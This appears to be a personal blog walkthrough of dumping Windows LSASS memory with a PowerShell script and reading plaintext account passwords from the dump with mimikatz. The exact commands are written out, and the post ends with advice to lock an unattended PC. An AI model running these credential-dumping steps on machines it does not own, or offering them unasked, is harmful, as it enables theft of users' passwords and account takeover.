I found this article mentioning about the existing vulnerability in Windows OS where you can get the plaintext view of your passwords on any unlocked Windows PC. So, I tried it on my Windows 10 PC and found that the vulnerability is still exist. The method used here is not new at all, and anyone can perform this hacking on any unlocked Windows PC providing that they know how to use the following tools.
In summary, here is what you need to do:
Tools you need
- mimikatz - just get the binary package, e.g.
mimikatz_trunk.zip - Out-Minidump.ps1 - PowerShell script
Download all the tools above first.
1. Perform memory dump using the PowerShell script
To perform the LSASS dump, I will use the PowerShell script - Out-Minidump.ps1. The flow of cmdlet will look like this:
. 'G:\USERFILES\Desktop\PowerShell Playground\Out-Minidump.ps1'
# "dot sourcing" method to import function from the script
Get-Process lsass | Out-Minidump
# To perform the LSASS dump
Copy-Item .\lsass_868.dmp 'G:\USERFILES\Desktop\PowerShell Playground'
# Copy the dump file to desired location
2. View the passwords using the mimikatz terminal program
As you can see, lsass_868.dmp is the example of LSASS dump file captured using the PowerShell script. Now, it’s time I need to use the mimikatz terminal to load in the dump file as follows:
sekurlsa::minidump "G:\USERFILES\Desktop\PowerShell Playground\lsass_868.dmp"
Switching to MINIDUMP file, so now I can view the passwords. Now, I will run this command to display all the accounts and passwords available:
sekurlsa::logonPasswords full
Voila! There, I can see my actual Microsoft Account username and password in a plaintext view.
Explanation of the vulnerability
The fact is that the password is encrypted but it’s useless as the implementation depends on two basic Win32 functions; LsaProtectMemory (the encryption function) and LsaUnprotectMemory (the decryption function). So, the Windows stores these encrypted user passwords in memory without using any of one-way hash algorithm which is decryptable using LsaUnprotectMemory function to a plain text.
It is RECOMMENDED to always LOCK your Windows PC when you are away, especially when you are in office or public place. This hacking can simply be done less than five minutes!